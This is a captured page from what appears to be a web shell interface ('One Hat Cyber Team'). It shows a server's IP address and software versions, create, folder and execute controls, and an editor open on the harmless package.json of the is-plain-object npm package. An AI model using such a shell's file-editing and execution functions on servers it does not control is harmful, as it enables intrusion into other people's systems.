⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
nodejs
/
is-plain-object
/
Edit File: package.json
{ "name": "is-plain-object", "description": "Returns true if an object was created by the `Object` constructor, or Object.create(null).", "version": "5.0.0", "homepage": "https://github.com/jonschlinkert/is-plain-object", "author": "Jon Schlinkert (https://github.com/jonschlinkert)", "contributors": [ "Jon Schlinkert (http://twitter.com/jonschlinkert)", "Osman Nuri Okumuş (http://onokumus.com)", "Steven Vachon (https://svachon.com)", "(https://github.com/wtgtybhertgeghgtwtg)", "Bogdan Chadkin (https://github.com/TrySound)" ], "repository": "jonschlinkert/is-plain-object", "bugs": { "url": "https://github.com/jonschlinkert/is-plain-object/issues" }, "license": "MIT", "main": "dist/is-plain-object.js", "module": "dist/is-plain-object.mjs", "types": "is-plain-object.d.ts", "files": [ "is-plain-object.d.ts", "dist" ], "exports": { ".": { "import": "./dist/is-plain-object.mjs", "require": "./dist/is-plain-object.js" }, "./package.json": "./package.json" }, "engines": { "node": ">=0.10.0" }, "scripts": { "build": "rollup -c", "test_browser": "mocha-headless-chrome --args=disable-web-security -f test/browser.html", "test_node": "mocha -r esm", "test": "npm run test_node && npm run build && npm run test_browser", "prepare": "rollup -c" }, "devDependencies": { "chai": "^4.2.0", "esm": "^3.2.22", "gulp-format-md": "^1.0.0", "mocha": "^6.1.4", "mocha-headless-chrome": "^3.1.0", "rollup": "^2.22.1" }, "keywords": [ "check", "is", "is-object", "isobject", "javascript", "kind", "kind-of", "object", "plain", "type", "typeof", "value" ], "verb": { "toc": false, "layout": "default", "tasks": [ "readme" ], "plugins": [ "gulp-format-md" ], "related": { "list": [ "is-number", "isobject", "kind-of" ] }, "lint": { "reflinks": true } } }
Simpan